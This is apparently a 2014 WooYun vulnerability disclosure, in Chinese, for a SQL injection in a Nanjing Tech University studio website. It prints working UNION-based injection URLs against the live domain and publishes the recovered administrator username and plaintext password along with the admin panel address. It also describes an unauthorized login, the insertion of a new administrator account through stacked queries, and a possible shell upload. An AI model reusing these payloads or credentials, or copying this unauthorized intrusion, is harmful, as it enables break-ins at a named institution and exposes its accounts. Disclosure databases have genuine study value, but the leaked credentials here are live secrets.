漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-064786
漏洞标题:南京工业大学常青藤工作室SQL注入漏洞
相关厂商:南京工业大学
漏洞作者: 路人甲
提交时间:2014-06-13 17:07
修复时间:2014-06-18 17:08
公开时间:2014-06-18 17:08
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-13: 细节已通知厂商并且等待厂商处理中
2014-06-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
部分页面存在sql注入漏洞可获取管理员账号密码,为了加入乌云这个大家庭就去友情测试了下这个站点……
详细说明:
随便找篇文章打开
http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18
未对参数进行任何过滤
字段猜测:
http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18'%20and%201=2%20union%20all%20select%201,2,3,4,'5',6,7,8,9--
爆表:
http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18'%20and%201=2%20union%20all%20select%201,2,3,4,(select top 1 name from sysobjects where xtype='U' order by name),6,7,8,9--
以此类推,最终获取用户名admin,密码cqt@7045
猜测后台:
http://cqtbf.njtech.edu.cn/newivy/Admin
成功登陆
![[JEA1(1][R`4~~]CP3IK7FM.jpg](https://w.hundan.org/articles/attach/201406/131355245540003f5f24418137c8d29f93d4f433.jpg)
在url中也可以通过分号闭合前面的sql查询然后添加新的sql语句,笔者就在administrator表中添加了一个新用户作为测试……
漏洞证明:
手工注入的时候忘了截图,于是用工具跑了下,截了些图:
![QX@~FQY]TIQ2{XT57%DPD3S.jpg](https://w.hundan.org/articles/attach/201406/131401056cd7dde5180c199bca80fbbd35e18c1b.jpg)
登陆后可在某处上传shell,截图如下:
修复方案:
对用户输入进行过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-18 17:08
厂商回复:
最新状态:
暂无